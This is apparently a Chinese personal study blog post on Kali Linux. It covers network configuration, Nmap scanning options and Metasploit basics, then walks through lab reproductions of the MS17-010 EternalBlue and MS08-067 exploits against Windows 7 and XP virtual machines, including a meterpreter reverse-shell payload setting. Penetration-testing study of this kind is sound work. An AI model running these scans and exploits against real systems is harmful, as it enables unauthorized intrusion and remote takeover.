kali的学习

网络配置

1.kali的网络设置

首先我们了解kali的网络设置

DHCP:动态主机配置协议 是一个局域网的协议 使用UDP 协议工作

静态IP:用于大部分的中小型网络 通过网络管理员手动分配IP

原理进程

/etc  系统大部分服务启动过程都要访问该目录 

我们直接去看看

/ect/network/interfaces
这里就可以配置两个

1.DHCP:

auto eth0
iface eth0 inet dhcp //配置eth0使用DHCP协议


2.静态ip

auto eth0
iface eth0 inet static //配置eth0使用默认的静态地址
address 192.168.0.90 //设置eth0的IP地址,根据需求配置
gateway 192.168.0.1 //配置当前主机的默认网关,根据需求配置
netmask 255.255.255.0 //配置eth0的子网掩码,根据需求配置

然后就是设置 DNS

resolv.conf中 可以配置3 个 nameserver 

一旦前面失效 就会尝试下一个 
vi /etc/resolv.conf #进行DNS编辑

    nameserver 114.114.114.114 //国内移动、电信和联通通用的DNS

    nameserver 8.8.8.8 //是谷歌的IP地址

    nameserver 223.5.5.5 //是阿里云的IP地址

    nameserver 180.76.76.87 //是百度的IP地址

保存,退出

然后进行重启网络设置

sudo service networking restart

2.kali的三种模式

NAT 网络地址转移模式

Bridged 桥接模式 

Host-Only 主机模式

NAT

NAT 就是虚拟系统会通过 宿主机 来访问外网

相当于主机存在两个网卡

一个是虚拟网卡 一个宿主机的网卡

当虚拟网卡想要访问外网的时候 就必须通过宿主机的IP地址

从外面看 就是宿主机的IP 是完全看不到虚拟环境的内部网络

这个时候 

虚拟机和宿主机和虚拟交换机形成一个网段

宿主机和真实交换机形成一个网段
优点

不需要自己手动分配ip

只要宿主能访问即可

Bridged

桥接模式就是 虚拟网卡和物理网卡通过 VMnet0虚拟交换机进行桥接


这个时候 VMnet0就相当于现实的交换机

他可以访问这个网络内的所有主机

但是需要手动设置 ip 子网掩码

这个模式中 可以互相ping

 Host-Only

在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。

其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。

kali的网络设置及三种网络模式_kali配置网络_木_木的博客-CSDN博客

NMAP

ctf工具Nmap使用教程图文教程(超详细)_ctf 端口扫描_程序员小麦的博客-CSDN博客

一.端口扫描

扫描主机开发的端口 与服务(默认是1000个端口)

nmap [ip]

这里将我本机的端口扫描出来了 并且显示了 每个端口的服务是什么

1.指定端口

其中我们可以对主机进行指定端口扫描 通过 -p指令

nmap 192.168.3.25 -p 80  单个

nmap 192.168.3.25 -p 1-80   范围

nmap 192.168.3.25 -p 80,3389,22,21  枚举

nmap 192.168.3.25 -p 1-65535   范围

nmap 192.168.3.25 -p-   相当于 1-65536

 2.指定扫描方式

-sT 使用三次完整的握手来判断存活 否则失败
-sS  通过两次握手来 如果对方传回确认帧 那么就存活

二.主机存活

可以扫描哪里主机存活

-sP 不扫描端口 只扫描主机

其实实质上就是 ping 只要ping通 就说明存活
nmap 192.168.3.0/24 -sP

上面显示了 256个IP中存在3个活着的 主机

三.服务扫描

在扫描端口的时候 会默认显示端口存在的服务

如果要查看服务的具体版本 就可以使用 -sV
nmap 192.168.3.25 -p 80 -sV

发现是 apache 的服务器

四.系统识别

-O 可以识别端口的主机的系统

nmap 192.168.3.25 -p 80 -O

 发现这里就显示 run在 win10上

五.探测防火墙

我们可以通过 nmap 来探测防火墙的存在

nmap 192.168.3.25  -sF

组合命令

T4可以指定时序 0-5 级别越高 速度越快 越容易被防火墙ban


nmap -F -T4 -P0

-F 100个端口  -P0 无ping扫描

nmap -sC -sV  -Pn  192.168.3.25

-sC 通过 nmap 脚本探测

-Pn 进制ping 后扫描 

-sV  版本探测

 

nmap -A -v -T4 +IP

 MSF

MATESPLOIT(MSF)是个免费开源的 攻击框架

附带了很多已知 知名的漏洞 

在刚刚MSF出现的时候 只要会使用 MSF 就可以对未打补丁或刚刚打补丁的进行攻击

在kali中自带了 MSF

所以我们只需要启动即可

msfconsole

 这里对MSF的几个模块进行解释

1、Auxiliary(辅助模块)

收集信息 提供大量辅助的一个模块

2、Exploits(攻击模块)

通过调动漏洞 进行攻击


3、Payload(攻击载荷模块)


攻击成功后促使靶机运行的一段植入代码

4、Post (后渗透攻击模块)


收集更多信息或进一步访问被利用的目标系统


5、Encoders(编码模块)


就是通过 编码绕过

首先来了解一下基础的用法

【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客

msfconsole

进入 msf框架

search  ms17_010

通过 search 命令查找漏洞

use exploit/windows/smb/ms17_010_eternalblue

通过 use 进入模块

info 

查看设置

set payload windows/x64/meterpreter/reverse_tcp  

设置 攻击模块为 这个漏洞

options

查看参数

set  RHOST  192.168.100.158   

设置攻击对象

run

进行攻击

大致就差不多是这样

我们复现一下 永恒之蓝 ms17-010

首先准备win7 的 IP  地址 我这里是 192.168.222.133

我们先通过 nmap 查看 一个网段存活的主机

nmap -sS 192.168.222.0/24

发现存在 5 个 其中能发现我们要攻击的主机ip

133

 那么我们就看看 他是什么系统的

nmap -O 192.168.222.133

 然后使用 nmap的脚本查看存在什么漏洞

nmap --script=vuln 192.168.222.133

 发现主角了 ms17-010 那么我们就请出MSF

msfconsole
search ms17-010

 这里exp的都是漏洞利用模块的 auxiliary是辅助探测模块 所以我们先通过 辅助探测 看看存不存在漏洞

这里直接 use 3

 然后看看info

 发现了 这里rhosts没有设置 而且是必须设置的选项

那我们就设置 为 攻击目标的ip范围

注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
set rhosts 192.168.222.100-192.168.222.190

exploit

扫到了

那我们直接通过

Exploit漏洞利用模块 对目标进行攻击
set rhosts 192.168.222.133

然后run 即可

 

这样就成功拿到shell了

 接下来复现另一个漏洞

MS08-067

ms08-067漏洞复现_ms08-067复现_老司机开代码的博客-CSDN博客

MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。

首先需要一个 xp的系统 一样这里的ip为137

那我们直接开始

nmap -sS 192.168.222.0/24

我们看看什么系统

nmap -O 192.168.222.137

发现也无法确定 那我们直接就 通过脚本扫

nmap --script=vuln 192.168.222.137

 扫到了 并且也存在永恒之蓝

那我们直接启动  msf

msfconsole

search MS08-067

use 0

options

set RHOSTS 192.168.222.137
show targets

set target 34

run

成功调用了cmd

  • 3
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值